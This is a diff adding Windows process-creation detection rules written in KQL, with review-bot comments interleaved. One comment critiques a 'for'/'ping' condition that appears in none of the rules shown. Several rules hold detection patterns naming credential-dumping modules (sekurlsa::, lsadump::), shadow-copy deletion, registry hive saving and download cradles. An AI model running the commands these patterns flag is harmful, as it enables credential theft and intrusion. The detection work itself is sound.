--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql
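Review bot: The scan-loop `where` clause uses `contains "for "` and `contains "ping"`, and KQL `contains` is a case-insensitive substring match, so any command line holding "format " or "before " together with "mapping", "shipping" or "ping" anywhere in it qualifies; the "Legitimate script" false-positive note understates how broad this is for a medium-level rule. If fidelity to the upstream rule is not required, the term-based operator is both more precise and cheaper to evaluate: `| where (ProcessCommandLine has "for" or ProcessCommandLine has "foreach") and (ProcessCommandLine has "nslookup" or ProcessCommandLine has "ping")`. If fidelity is required, a comment above the query noting the expected noise and the intended tuning would help whoever triages the alerts.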
@@ -0,0 +1,13 @@
+// Title: Suspicious Scheduled Task Creation Involving Temp Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-11
+// Level: high
+// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
new file mode 100644
index 00000000..0965c137
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Creation via Masqueraded XML File
+// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
+// Date: 2023-04-20
+// Level: medium
+// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql
new file mode 100644
index 00000000..0d94fa9e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scheduled Task Name As GUID
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: medium
+// Description: Detects creation of a scheduled task with a GUID like name
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Legitimate software naming their tasks as GUIDs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql
new file mode 100644
index 00000000..371ae1d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Schtasks Execution AppData Folder
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-15
+// Level: high
+// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql
new file mode 100644
index 00000000..766acfaf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql
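Review bot: The Description reads `C:\Users\\AppData\Local` with an empty path segment, which looks like a placeholder for the per-user folder name that was lost in conversion or rendering, presumably because it was angle-bracketed in the source rule and stripped as markup. The header should carry it in a form that survives, e.g. `// Description: Detects the creation of a schtask that executes a file from C:\Users\[username]\AppData\Local`; the query itself matches `C:\\Users\\` and `\\AppData\\Local\\` as separate substrings, so detection is unaffected. Worth checking how the converter handles `<` and `>` in descriptions across the other rules, since the same stripping would silently affect any of them.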
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Type With High Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Some installers were seen using this method of creation unfortunately. Filter them in your environment
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql
new file mode 100644
index 00000000..8cc509c2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Types
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects scheduled task creations or modification on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Legitimate processes that run at logon. Filter according to your environment
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql
new file mode 100644
index 00000000..7cd415cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ScreenSave Change by Reg.exe
+// Author: frack113
+// Date: 2021-08-19
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+// - GPO
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql
new file mode 100644
index 00000000..afe5bb3a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Script Execution From Temp Folder
+// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious script executions from temporary folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql
new file mode 100644
index 00000000..b074209f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Serv-U Process Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, cve.2021-35211
+// False Positives:
+// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql
new file mode 100644
index 00000000..57d3591f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Service Binary Directory
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: high
+// Description: Detects a service binary running in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
new file mode 100644
index 00000000..3631267b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql
new file mode 100644
index 00000000..845ab73d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Service Path Modification
+// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: high
+// Description: Detects service path modification via the "sc" binary to a suspicious command or path
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql
new file mode 100644
index 00000000..bfff2e09
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious ShellExec_RunDLL Call Via Ordinal
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-12-01
+// Level: high
+// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
+// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql
new file mode 100644
index 00000000..436716d6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Shells Spawn by Java Utility Keytool
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-22
+// Level: high
+// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql
new file mode 100644
index 00000000..1c1335e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Speech Runtime Binary Child Process
+// Author: andrewdanis
+// Date: 2025-10-23
+// Level: high
+// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
+// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
+// False Positives:
+// - Unlikely.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql
new file mode 100644
index 00000000..a22c6dfa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Splwow64 Without Params
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious Splwow64.exe process without any command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql
new file mode 100644
index 00000000..1ab26495
--- /dev/null
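Review bot: The Speech Runtime rule's entire condition is `InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"`, so every child of that binary fires at level high with no child-image or command-line constraint, yet the header declares false positives "Unlikely"; if the upstream rule also carries an image list or a filter, it appears not to have survived conversion and should be checked against the source rule. If a parent-only match is intended, a header comment such as `// Note: any child process of SpeechRuntime.exe matches; add environment-specific exclusions to this query rather than widening the parent check` would set the analyst's expectations. The splwow64 rule on the same line is a straightforward no-arguments check (`ProcessCommandLine endswith "splwow64.exe"`) and raises no concern.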
+++ b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Spool Service Child Process +// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) +// Date: 2021-07-11 +// Level: high +// Description: Detects suspicious print spool service (spoolsv.exe) child processes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents +| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or 
(ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql new file mode 100644 index 00000000..f3b5f281 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql @@ -0,0 +1,10 @@ +// Title: Suspicious SysAidServer Child +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210 + +DeviceProcessEvents +| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql new file mode 100644 index 00000000..706dd2f1 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql 
@@ -0,0 +1,14 @@ +// Title: Suspicious SYSTEM User Process Creation +// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) +// Date: 2021-12-20 +// Level: high +// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027 +// False Positives: +// - Administrative activity +// - Scripts and administrative tools used in the monitored environment +// - Monitoring activity + +DeviceProcessEvents +| where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine 
contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" 